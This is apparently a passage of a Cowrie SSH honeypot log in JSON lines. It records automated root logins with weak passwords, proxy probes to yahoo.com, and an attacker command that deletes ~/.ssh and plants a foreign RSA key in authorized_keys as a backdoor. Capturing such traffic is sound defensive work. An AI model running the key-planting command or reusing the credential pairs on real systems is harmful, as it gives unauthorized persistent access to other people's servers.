{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.401908Z","src_ip":"213.209.150.239","session":"bfe2004b4e73"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc123321","message":"login attempt [root/zxc123321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.549835Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.684150Z","src_ip":"213.209.150.239","session":"bfe2004b4e73"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":15138,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:15138","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.741920Z","session":"bfe2004b4e73"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.798780Z","src_ip":"213.209.150.239","session":"bfe2004b4e73"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":18813,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18813","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.955077Z","session":"bfe2004b4e73"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.012365Z","src_ip":"213.209.150.239","session":"bfe2004b4e73"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.070068Z","src_ip":"213.209.150.239","session":"bfe2004b4e73"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:03:48.149650Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.150474Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.152376Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28560,"dst_ip":"1.2.3.4","dst_port":22,"session":"f505f4ddaa4e","protocol":"ssh","message":"New connection: 213.209.150.239:28560 (1.2.3.4:22) [session: f505f4ddaa4e]","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.153689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.154717Z","src_ip":"213.209.150.239","session":"f505f4ddaa4e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.201986Z","src_ip":"213.209.150.239","session":"f505f4ddaa4e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.425749Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.436899Z","src_ip":"213.209.150.239","session":"f505f4ddaa4e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":26598,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:26598","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.485983Z","session":"f505f4ddaa4e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.533555Z","src_ip":"213.209.150.239","session":"f505f4ddaa4e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":25822,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:25822","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.669497Z","session":"f505f4ddaa4e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.716626Z","src_ip":"213.209.150.239","session":"f505f4ddaa4e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.764441Z","src_ip":"213.209.150.239","session":"f505f4ddaa4e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28612,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2595d9be50a","protocol":"ssh","message":"New connection: 213.209.150.239:28612 (1.2.3.4:22) [session: f2595d9be50a]","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.810589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.811604Z","src_ip":"213.209.150.239","session":"f2595d9be50a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.858656Z","src_ip":"213.209.150.239","session":"f2595d9be50a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:03:48.986216Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T01:03:48.986896Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.092982Z","src_ip":"213.209.150.239","session":"f2595d9be50a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":6061,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6061","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.140993Z","session":"f2595d9be50a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.188172Z","src_ip":"213.209.150.239","session":"f2595d9be50a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.260499Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.261461Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":27681,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27681","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.325510Z","session":"f2595d9be50a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.373620Z","src_ip":"213.209.150.239","session":"f2595d9be50a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.421923Z","src_ip":"213.209.150.239","session":"f2595d9be50a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28664,"dst_ip":"1.2.3.4","dst_port":22,"session":"2425046764b4","protocol":"ssh","message":"New connection: 213.209.150.239:28664 (1.2.3.4:22) [session: 2425046764b4]","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.477893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.478753Z","src_ip":"213.209.150.239","session":"2425046764b4"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":35920,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a7b663649e3","protocol":"ssh","message":"New connection: 27.112.78.170:35920 (1.2.3.4:22) [session: 1a7b663649e3]","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.522064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.522999Z","src_ip":"27.112.78.170","session":"1a7b663649e3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.535556Z","src_ip":"213.209.150.239","session":"2425046764b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.781803Z","src_ip":"27.112.78.170","session":"1a7b663649e3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.818310Z","src_ip":"213.209.150.239","session":"2425046764b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":31095,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31095","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.876017Z","session":"2425046764b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:49.933143Z","src_ip":"213.209.150.239","session":"2425046764b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":25960,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25960","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.087057Z","session":"2425046764b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.143858Z","src_ip":"213.209.150.239","session":"2425046764b4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.201267Z","src_ip":"213.209.150.239","session":"2425046764b4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28720,"dst_ip":"1.2.3.4","dst_port":22,"session":"15c15defb36b","protocol":"ssh","message":"New connection: 213.209.150.239:28720 (1.2.3.4:22) [session: 15c15defb36b]","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.256876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.257484Z","src_ip":"213.209.150.239","session":"15c15defb36b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac